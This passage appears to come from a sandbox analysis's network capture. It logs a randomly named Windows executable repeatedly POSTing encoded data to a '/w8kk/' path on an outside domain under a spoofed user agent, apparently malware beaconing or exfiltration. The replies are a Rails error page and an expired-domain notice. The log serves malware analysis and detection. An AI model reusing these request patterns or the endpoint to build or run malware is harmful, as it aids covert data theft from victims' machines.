May 27, 2024 12:22:09.978523970 CEST	1236	IN	Data Raw: 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a Data Ascii: thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middl
May 27, 2024 12:22:09.978534937 CEST	1236	IN	Data Raw: 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 Data Ascii: ss="trace-frames" data-frame-id="8" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in
May 27, 2024 12:22:09.978548050 CEST	1000	IN	Data Raw: 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 65 6e 67 69 6e 65 2e 72 62 3a 35 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d Data Ascii: .6) lib/rails/engine.rb:524:in `call'</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/serv
May 27, 2024 12:22:09.983711958 CEST	1236	IN	Data Raw: 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74 Data Ascii: r('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.12	49749	216.40.34.41	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:11.983424902 CEST	726	OUT	POST /w8kk/ HTTP/1.1 Host: www.pinpointopia.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pinpointopia.com Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.pinpointopia.com/w8kk/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 38 43 42 69 64 6f 53 4c 70 31 6f 4f 38 2b 75 4a 64 72 4c 42 75 58 52 35 35 48 6e 34 66 52 64 6c 61 42 6f 46 5a 54 6e 76 53 4f 55 78 75 43 6e 63 73 52 69 4a 78 61 6f 46 6e 48 62 72 66 48 45 4c 31 6a 6e 56 35 59 4d 51 4b 47 50 71 72 2b 56 43 5a 41 32 41 51 31 77 30 63 6a 49 51 51 62 4c 73 36 75 61 30 5a 69 51 32 51 66 43 2f 45 79 78 34 61 34 58 61 58 5a 65 55 4b 55 37 38 4d 6f 5a 43 74 56 55 42 6a 43 37 44 51 44 2b 2b 4e 37 65 79 75 72 6f 58 66 4d 74 57 6d 6f 57 35 54 72 55 43 6a 32 44 77 6c 38 46 45 69 44 65 4e 4c 6a 7a 6b 75 62 4a 41 30 4b 4b 4a 6a 74 66 68 5a 63 78 55 39 57 5a 76 4d 64 33 37 56 57 54 78 51 36 73 78 58 56 64 30 65 47 41 3d Data Ascii: VlEHDVvh=8CBidoSLp1oO8+uJdrLBuXR55Hn4fRdlaBoFZTnvSOUxuCncsRiJxaoFnHbrfHEL1jnV5YMQKGPqr+VCZA2AQ1w0cjIQQbLs6ua0ZiQ2QfC/Eyx4a4XaXZeUKU78MoZCtVUBjC7DQD++N7eyuroXfMtWmoW5TrUCj2Dwl8FEiDeNLjzkubJA0KKJjtfhZcxU9WZvMd37VWTxQ6sxXVd0eGA=
May 27, 2024 12:22:12.285367012 CEST	726	OUT	POST /w8kk/ HTTP/1.1 Host: www.pinpointopia.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pinpointopia.com Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.pinpointopia.com/w8kk/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 38 43 42 69 64 6f 53 4c 70 31 6f 4f 38 2b 75 4a 64 72 4c 42 75 58 52 35 35 48 6e 34 66 52 64 6c 61 42 6f 46 5a 54 6e 76 53 4f 55 78 75 43 6e 63 73 52 69 4a 78 61 6f 46 6e 48 62 72 66 48 45 4c 31 6a 6e 56 35 59 4d 51 4b 47 50 71 72 2b 56 43 5a 41 32 41 51 31 77 30 63 6a 49 51 51 62 4c 73 36 75 61 30 5a 69 51 32 51 66 43 2f 45 79 78 34 61 34 58 61 58 5a 65 55 4b 55 37 38 4d 6f 5a 43 74 56 55 42 6a 43 37 44 51 44 2b 2b 4e 37 65 79 75 72 6f 58 66 4d 74 57 6d 6f 57 35 54 72 55 43 6a 32 44 77 6c 38 46 45 69 44 65 4e 4c 6a 7a 6b 75 62 4a 41 30 4b 4b 4a 6a 74 66 68 5a 63 78 55 39 57 5a 76 4d 64 33 37 56 57 54 78 51 36 73 78 58 56 64 30 65 47 41 3d Data Ascii: VlEHDVvh=8CBidoSLp1oO8+uJdrLBuXR55Hn4fRdlaBoFZTnvSOUxuCncsRiJxaoFnHbrfHEL1jnV5YMQKGPqr+VCZA2AQ1w0cjIQQbLs6ua0ZiQ2QfC/Eyx4a4XaXZeUKU78MoZCtVUBjC7DQD++N7eyuroXfMtWmoW5TrUCj2Dwl8FEiDeNLjzkubJA0KKJjtfhZcxU9WZvMd37VWTxQ6sxXVd0eGA=
May 27, 2024 12:22:12.894186020 CEST	726	OUT	POST /w8kk/ HTTP/1.1 Host: www.pinpointopia.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pinpointopia.com Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.pinpointopia.com/w8kk/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 38 43 42 69 64 6f 53 4c 70 31 6f 4f 38 2b 75 4a 64 72 4c 42 75 58 52 35 35 48 6e 34 66 52 64 6c 61 42 6f 46 5a 54 6e 76 53 4f 55 78 75 43 6e 63 73 52 69 4a 78 61 6f 46 6e 48 62 72 66 48 45 4c 31 6a 6e 56 35 59 4d 51 4b 47 50 71 72 2b 56 43 5a 41 32 41 51 31 77 30 63 6a 49 51 51 62 4c 73 36 75 61 30 5a 69 51 32 51 66 43 2f 45 79 78 34 61 34 58 61 58 5a 65 55 4b 55 37 38 4d 6f 5a 43 74 56 55 42 6a 43 37 44 51 44 2b 2b 4e 37 65 79 75 72 6f 58 66 4d 74 57 6d 6f 57 35 54 72 55 43 6a 32 44 77 6c 38 46 45 69 44 65 4e 4c 6a 7a 6b 75 62 4a 41 30 4b 4b 4a 6a 74 66 68 5a 63 78 55 39 57 5a 76 4d 64 33 37 56 57 54 78 51 36 73 78 58 56 64 30 65 47 41 3d Data Ascii: VlEHDVvh=8CBidoSLp1oO8+uJdrLBuXR55Hn4fRdlaBoFZTnvSOUxuCncsRiJxaoFnHbrfHEL1jnV5YMQKGPqr+VCZA2AQ1w0cjIQQbLs6ua0ZiQ2QfC/Eyx4a4XaXZeUKU78MoZCtVUBjC7DQD++N7eyuroXfMtWmoW5TrUCj2Dwl8FEiDeNLjzkubJA0KKJjtfhZcxU9WZvMd37VWTxQ6sxXVd0eGA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.12	49750	216.40.34.41	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:14.518723011 CEST	1739	OUT	POST /w8kk/ HTTP/1.1 Host: www.pinpointopia.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pinpointopia.com Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.pinpointopia.com/w8kk/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 38 43 42 69 64 6f 53 4c 70 31 6f 4f 38 2b 75 4a 64 72 4c 42 75 58 52 35 35 48 6e 34 66 52 64 6c 61 42 6f 46 5a 54 6e 76 53 4f 63 78 75 77 66 63 74 79 4b 4a 77 61 6f 46 6f 58 62 6d 66 48 45 73 31 6a 2f 52 35 59 4a 6c 4b 45 48 71 74 6f 4a 43 4a 68 32 41 61 31 77 30 44 54 49 52 4e 4c 4b 32 36 75 4b 34 5a 69 41 32 51 66 43 2f 45 77 5a 34 65 70 58 61 56 5a 65 58 61 45 37 77 61 59 5a 2b 74 56 74 36 6a 44 4f 38 52 7a 65 2b 4d 62 4f 79 69 39 63 58 41 63 74 59 31 59 57 68 54 71 6f 64 6a 32 66 53 6c 2f 5a 71 69 45 79 4e 50 55 79 45 71 2f 56 6e 71 38 54 76 75 71 62 6e 58 62 5a 69 77 78 74 4d 48 37 58 6c 47 48 7a 42 4c 61 64 6b 45 48 6c 43 49 54 31 38 64 72 42 42 73 4c 4a 6c 70 5a 6a 76 36 32 78 33 35 66 66 62 4f 52 75 48 37 78 64 4f 77 62 4c 58 2b 65 39 70 56 4d 69 4c 6f 48 4a 61 50 75 66 34 6c 43 71 43 51 54 72 51 36 4a 75 51 33 6e 58 57 4a 47 46 6e 6c 6c 52 70 42 54 52 79 6c 6e 7a 53 2b 65 64 2f 74 44 39 49 61 41 55 4a 6e 4b 6a 30 6a 6a 5a 2f 66 72 6d 6d 4b 6c 4e 49 67 39 55 72 72 [TRUNCATED] Data Ascii: VlEHDVvh=8CBidoSLp1oO8+uJdrLBuXR55Hn4fRdlaBoFZTnvSOcxuwfctyKJwaoFoXbmfHEs1j/R5YJlKEHqtoJCJh2Aa1w0DTIRNLK26uK4ZiA2QfC/EwZ4epXaVZeXaE7waYZ+tVt6jDO8Rze+MbOyi9cXActY1YWhTqodj2fSl/ZqiEyNPUyEq/Vnq8TvuqbnXbZiwxtMH7XlGHzBLadkEHlCIT18drBBsLJlpZjv62x35ffbORuH7xdOwbLX+e9pVMiLoHJaPuf4lCqCQTrQ6JuQ3nXWJGFnllRpBTRylnzS+ed/tD9IaAUJnKj0jjZ/frmmKlNIg9UrrPU6xIZgTlvxG7vN2jwHdENHzu3fVCdCedHn3awRVoFtrYlAyf+Bj3YfqzwSoB9zbHSRdW8pkIRfzA+Oynhs3cDqrV6nBKLe74mtjhqlCxA0N7AkxRmwGni+fJqaV85SzTFENoLG2yLBAZq/kG0hLOEhOtObQF52J5h90VqVugBHg0wWY/jade7ulpsfkHP5VymsvQ0PStmRjPIPYsfyr186GczMLgubfLD6a9RYKjCtoND67ZavkfVm7vIT1dmAG5NvzKRuS1lDNjKKnRDwtPased0AOBRDqMlo74tMxCbdW2SBt1DwiuQuPgNd35LFudZEOec0s3Lihbyed+NbkDw+eCzSaQyON1U7FuVqL31YybdpMALTtc+99vMsgGmNRQ4CSMsVQvdDeEfjtgCOixVhDMcsIE+FxmrbAc1A9ETqJdBAJNRyIwSnEu1Ek8NdH+YeTKJNLhjVeA9Cvwe1ghJmHDNQ+BRJFBZuR1SZQXov2XZ1JmkWq6z/d5HFybHPLWW1SkeMnPXnFE5+/QBL2LXCH1n0EcFKieHC0xnrD7MJzY1YzMoQJ9wIgQn3qzKt6AeVpaDQAqYhNGgvbzG4zzeEw7USW2DEFgipQrMvZZq5SvtdCzhqNJrXmbEkc3WmJQdg0Wg3RZQhbAJNCcS2CPNR33Rmlx2k7HP [TRUNCATED]
May 27, 2024 12:22:14.534817934 CEST	1236	OUT	Data Raw: 6c 45 48 44 56 76 68 3d 38 43 42 69 64 6f 53 4c 70 31 6f 4f 38 2b 75 4a 64 72 4c 42 75 58 52 35 35 48 6e 34 66 52 64 6c 61 42 6f 46 5a 54 6e 76 53 4f 63 78 75 77 66 63 74 79 4b 4a 77 61 6f 46 6f 58 62 6d 66 48 45 73 31 6a 2f 52 35 59 4a 6c 4b 45 Data Ascii: lEHDVvh=8CBidoSLp1oO8+uJdrLBuXR55Hn4fRdlaBoFZTnvSOcxuwfctyKJwaoFoXbmfHEs1j/R5YJlKEHqtoJCJh2Aa1w0DTIRNLK26uK4ZiA2QfC/EwZ4epXaVZeXaE7waYZ+tVt6jDO8Rze+MbOyi9cXActY1YWhTqodj2fSl/ZqiEyNPUyEq/Vnq8TvuqbnXbZiwxtMH7XlGHzBLadkEHlCIT18drBBsLJlpZjv62x35ff
May 27, 2024 12:22:15.024204016 CEST	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: ca0020ec-6f8f-45c3-a730-c752ca7b3591 x-runtime: 0.030846 content-length: 19142 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
May 27, 2024 12:22:15.024225950 CEST	224	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
May 27, 2024 12:22:15.024525881 CEST	1236	IN	Data Raw: 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
May 27, 2024 12:22:15.024538994 CEST	1236	IN	Data Raw: 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
May 27, 2024 12:22:15.024549961 CEST	1236	IN	Data Raw: 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 77 38 6b 6b 26 71 75 6f 74 3b 3c 2f 68 32 3e Data Ascii: /header><div id="container"> <h2>No route matches [POST] "/w8kk"</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide('Framework-Trace');hide('Full-Trace');show(&#
May 27, 2024 12:22:15.024560928 CEST	1236	IN	Data Raw: 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32 36 3a 69 6e 20 60 62 6c 6f 63 6b 20 Data Ascii: data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call'</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged'</a>
May 27, 2024 12:22:15.024574041 CEST	1236	IN	Data Raw: 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 33 22 20 68 72 65 66 3d 22 Data Ascii: ntime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call'</a><br><a class="trace-frames" data-frame-id="14" href="#">
May 27, 2024 12:22:15.024585962 CEST	1236	IN	Data Raw: 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a Data Ascii: thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middl
May 27, 2024 12:22:15.024600029 CEST	1236	IN	Data Raw: 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 Data Ascii: ss="trace-frames" data-frame-id="8" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in
May 27, 2024 12:22:15.024612904 CEST	1000	IN	Data Raw: 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 65 6e 67 69 6e 65 2e 72 62 3a 35 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d Data Ascii: .6) lib/rails/engine.rb:524:in `call'</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/serv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.12	49751	216.40.34.41	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:17.061400890 CEST	428	OUT	GET /w8kk/?VlEHDVvh=xApCedPshlFqhM+jKZfmvnpl71z0cBQVdhsyYTPYXO8jvxnjhAjWxt0ri1XYL1kB/lDsxIYle23q9eZueg3dcjYKciZZWPOZx8TMcQAQa9bvKBBzdKnYGI4=&BHPD=o2nt HTTP/1.1 Host: www.pinpointopia.com Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:22:17.548943043 CEST	1236	IN	HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin content-type: text/html; charset=utf-8 etag: W/"f7227203ffd45d2708fe60a7a27fd9c6" cache-control: max-age=0, private, must-revalidate x-request-id: 1105f83d-9b8c-4b4d-9422-023ed21cc07e x-runtime: 0.009369 transfer-encoding: chunked connection: close Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED] Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>pinpointopia.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expir
May 27, 2024 12:22:17.548973083 CEST	224	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 Data Ascii: ed"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>pinpointopia.com</h1><h2>has expired.</h2><div class='cta'><a
May 27, 2024 12:22:17.548986912 CEST	1236	IN	Data Raw: 63 6c 61 73 73 3d 27 62 74 6e 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 72 65 6e 65 77 2f 64 6f 6d 61 69 6e 2f 70 69 6e 70 6f 69 6e 74 6f 70 69 61 2e 63 6f 6d 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 Data Ascii: class='btn' href='https://www.hover.com/renew/domain/pinpointopia.com?source=expired'>Renew now</a></div><p class='note'>If you know the owner of this domain, please let them know.</p><form action='https://www.hover.com/domains/results' me
May 27, 2024 12:22:17.549000025 CEST	1236	IN	Data Raw: 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 68 6f 76 65 72 2e 63 6f 6d 2f 68 6f 6d 65 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 65 64 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 Data Ascii: i><a rel="nofollow" href="https://help.hover.com/home?source=expired">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=expired">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollow" href
May 27, 2024 12:22:17.549034119 CEST	1236	IN	Data Raw: 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e 30 32 38 37 39 2c 35 2e 31 39 36 36 32 20 2d 34 2e 37 36 34 34 33 2c 31 Data Ascii: 24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.0
